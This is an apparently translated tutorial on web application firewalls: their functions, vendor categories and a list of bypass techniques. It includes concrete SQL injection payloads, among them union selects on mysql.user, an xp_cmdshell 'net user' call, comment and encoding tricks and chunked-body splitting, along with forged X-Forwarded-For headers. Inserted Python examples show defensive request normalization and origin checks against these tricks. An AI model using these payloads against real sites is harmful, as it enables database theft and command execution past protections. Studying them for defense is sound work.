I. WAF working principle

A Web application firewall (WAF) is a product that protects Web applications by enforcing a set of security policies on HTTP/HTTPS traffic.

Common attacks on Web systems fall into two categories:

  • The first exploits vulnerabilities in the Web server itself, for example DDoS attacks and destructive attacks by viruses and Trojans;
  • The second exploits vulnerabilities in the Web application itself, such as SQL injection and cross-site scripting. Attacks on Web servers mainly take the form of viruses and Trojans, unauthorized tampering with Web pages, and the threats brought by various network attacks.

1. Introduction to WAF

WAF is short for Web Application Firewall. It inspects and validates every kind of request sent by Web application clients to make sure they are safe and legitimate, blocks illegal requests in real time, and so protects the Web application. A WAF is also called an application firewall. In network security it is an important part of a defense-in-depth system, and it belongs to the detective and corrective classes of security control. WAFs are classified into hardware WAFs, software WAFs (for example ModSecurity), and cloud WAFs.

The WAF performs rule matching and behavior analysis on the request content to identify malicious behavior and then takes the corresponding action, such as blocking, logging, or alerting.

2. Main functions of WAF

  1. Active defense against and removal of Web Trojans

Using a signature-plus-heuristic-engine algorithm, the Web Trojan scanning tool achieves a detection rate of more than 90%.

  2. Traffic monitoring

Real-time monitoring of inbound, outbound and total traffic for each site, as well as CPU usage for each application pool and site.

  3. Website vulnerability defense

Intercepts SQL injection delivered through GET, POST, COOKIE and other forms, allows separate signatures to be defined for GET, POST and COOKIE, and intercepts XSS injection and similar behavior.

  4. Protection of dangerous components

Comprehensively intercepts malicious code that invokes component permissions and blocks malicious programs under IIS, protecting the website.

  5. .NET security protection module

Quickly sets the .NET security mode and disables the execution of sensitive system functions from .NET, securing the website.

  6. Dual-layer anti-hotlinking mode

Hotlink filtering can be configured per site to stop images, wallpapers, software, music and movies from being referenced by other sites. If a requester is found to be hotlinking, it is automatically redirected to the error-handling page.

  7. Anti-download protection for specific site resources

Supports anti-download protection for doc, MDB, MDF, MYD and other specific resource types. Add the path of the sensitive data to be protected to prevent it from being downloaded.

  8.

An independently developed, unique anti-attack algorithm and an efficient active-defense system effectively defend against CC attacks (HTTP floods) and traffic attacks.

  9. Site traffic protection

Supports download bandwidth control and download thread control. The original thread-control and flow-control technology greatly improves server performance and protects website traffic.

  10. IP blacklist and whitelist

The global IP blacklist/whitelist lets users set a personalized IP trust list and directly block or allow specific IP addresses' access to the website. A temporary IP blacklist is also provided, as well as an IP whitelist for individual functions. In addition, the crawler whitelist provides a crawler trust mechanism, letting users customize which crawlers are trusted in case of false interception.

II. WAF classification on the market

1. Hardware WAF:

Green Alliance, Qiming, Anheng, Knownsec, Tianrongxin, etc.

Hardware WAFs are deployed inline in front of the Web servers to detect and block abnormal traffic. A conventional hardware WAF is implemented as a proxy: it terminates the traffic arriving from outside, parses each request packet, and matches it against the attack rules in its security rule base. If a rule in the rule base matches, the request is identified as anomalous and blocked.

2. Software WAF:

Security Dog, Cloud Lock, built-in WAF modules of middleware, D Shield, etc.

A software WAF is installed on the server that needs to be protected. It is usually implemented either as a WAF process listening on a port or as a Web container extension that inspects and blocks requests.

3. Cloud WAF:

Ali Cloud, Security Dog, Anheng, Knownsec, Tencent Website Manager, etc.

A cloud WAF, also called the cloud mode of the Web application firewall, lets users protect their websites without installing software or deploying hardware in their own network. It works mainly by taking over domain name resolution through DNS: the user's request is first sent to the cloud node for inspection; an abnormal request is intercepted, otherwise the request is forwarded to the real server.

III. WAF bypass methods

1. Install the Bypass WAF module in Burp

  • Steps: Extender – BApp Store – Bypass WAF
  • Project options – Sessions – Session handling rules – Add

2. Use tools to forge the User-Agent header of Baidu, Google and similar, or forge whitelisted special directories

  • Changing the User-Agent to that of Baidu or another major search engine can bypass the WAF; replace it here with the User-Agent of Baidu or another search engine

3. Encoding bypass: encoding the SQL statement can bypass the WAF

4. Modified-request bypass

  • Use the WAF's default rules to bypass it: for example, if by default it only intercepts GET and not POST, we can bypass the WAF by sending the request as POST

5. Compound-parameter bypass

  • For example, a request looks like this

GET /pen/news.php?id=1 union select user,password from mysql.user

  • It can be changed to

GET /pen/news.php?id=1&id=union&id=select&id=user,password&id=from%20mysql.user

Many WAFs can be bypassed in this way; when tested, the latest version of the WAF still let some statements through.

6. Bypassing the WAF's trigger rules

Special characters replacing spaces: %0a /**/ %23 - /*|%%23|*/
Special character concatenation: +
  • Such as: GET /pen/news.php?id=1; exec(master..xp_cmdshell 'net user')
  • Could become: GET /pen/news.php?id=1; exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
Comments containing keywords

Such as: GET /pen/news.php?id=1 union select user,password from mysql.user

GET /pen/news.php?id=1 /*!union*/ /*!select*/ user,password /*!from*/ mysql.user

Space substitution
  • Replace the space with %0a or /**/ to bypass
Case variation
  • http://www.***.com/index.php?page_id=15 uNIoN sELecT 1,2,3,4...
Double-writing bypass
  • UNIunionON SELselectECT 1,2,3,4... After the WAF filters it once, it becomes union select 1,2,3,4...
XOR bypass
  • lucy' xor '1'='1' #

Using the WAF's own features to bypass it: the WAF replaces “” with an empty string, so union+sel*ect+1,2,3,4... gets through.

Combinations: encoding and comments

1. Replace method + URL encoding; 2. comment + replace method; 3. inline comment + replace method

Urlencode = %26%26%20%26%26%20-1=-1

7. Chunked-transfer bypass

Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 87

4
id=1
6
 union
7
 select
2
 1
8
,user(),
5
3,4,5
0

With Transfer-Encoding: chunked, the server reassembles the body into:

id=1 union select 1,user(),3,4,5
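Sections 5 to 7 all exploit a WAF that matches its rules against the raw request. Added here as an example (not code from the article), this is the normalization step a defender puts in front of the rule: reassemble chunked bodies, URL-decode until stable, fold /**/ and /*!...*/ comments, collapse the space substitutes and merge repeated parameters, so the rule sees one canonical string. The UNION_SELECT rule and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed rule: every trick in sections 5 to 7 tries to get "union ... select" past the WAF.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)

def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body so the rule sees the joined payload."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # hex chunk size; ignore chunk extensions
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                       # skip the data and its trailing CRLF

def normalize(value: str) -> str:
    """Canonical form the rule matches against. Nothing is deleted, only folded, so the
    double-writing trick (UNIunionON) has no filter to exploit and stays invalid SQL."""
    prev = None
    while value != prev:                               # decode until stable: %2575 -> %75 -> u
        prev, value = value, unquote(value)
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.DOTALL)  # /*!union*/ -> union
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)            # /**/ -> one space
    value = re.sub(r"[\s+]+", " ", value)              # %0a, tabs, '+' and space runs -> one space
    return value.lower()                               # uNIoN sELecT -> union select

def inspect_query(query: str) -> bool:
    """Merge repeated parameters (id=1&id=union&id=select...) before matching each name."""
    merged: dict[str, list[str]] = {}
    for name, val in parse_qsl(query, keep_blank_values=True):
        merged.setdefault(name, []).append(val)
    return any(UNION_SELECT.search(normalize(" ".join(vals))) for vals in merged.values())

def inspect_request(headers: dict[str, str], body: bytes) -> bool:
    """Inspect a POST body, de-chunking first when the request says it is chunked."""
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        body = dechunk(body)
    return inspect_query(body.decode("latin-1"))
```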

8. Cloud WAF bypass

Look for the real IP address of the origin server to bypass the cloud WAF.

Forge request header information sent to the cloud WAF:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
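Both bypasses in section 8, reaching the origin directly and forging X-Forwarded-For style headers, are defeated at the origin by one rule: trust a forwarding header only when the TCP peer is a WAF node, and refuse everything that did not come through the WAF. This is an added example, not the article's code; the WAF_NODES range and the set of spoofable headers are constructed from the list above.

```python
import ipaddress

# Constructed allow-list of the cloud WAF's egress nodes; a real deployment loads the
# provider's published ranges. Only these addresses should ever reach the origin.
WAF_NODES = [ipaddress.ip_network("198.51.100.0/24")]

# The headers the page lists are all set by the client and carry no trust of their own.
SPOOFABLE = {"x-originating-ip", "x-remote-ip", "x-remote-addr", "x-client-ip"}

def from_waf(addr: str) -> bool:
    """True when addr lies inside one of our WAF node ranges (raises on malformed input)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in WAF_NODES)

def client_ip(peer: str, headers: dict[str, str]) -> str:
    """Address to log, rate-limit and block on.

    peer is the TCP source of the connection to the origin. If it is not a WAF node the
    request came in around the WAF (the 'real IP' case), so every forwarding header is
    ignored and peer itself is the client. Otherwise walk X-Forwarded-For from the right,
    past our own nodes, and take the hop the WAF saw, not the value the client sent."""
    if not from_waf(peer):
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            if not from_waf(hop):
                return hop
        except ValueError:                 # "127.0.0.1 junk" and similar are never trusted
            break
    return peer

def sanitize_headers(headers: dict[str, str]) -> dict[str, str]:
    """Drop the spoofable hint headers so nothing behind the WAF can be misled by them."""
    return {k: v for k, v in headers.items() if k.lower() not in SPOOFABLE}

def accept_at_origin(peer: str) -> bool:
    """Origin-side gate: refuse connections that did not arrive through the WAF at all."""
    return from_waf(peer)
```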

There are many ways to bypass a WAF, and many of them are already obsolete. You need to keep thinking about new possibilities for bypassing it, and keep improving.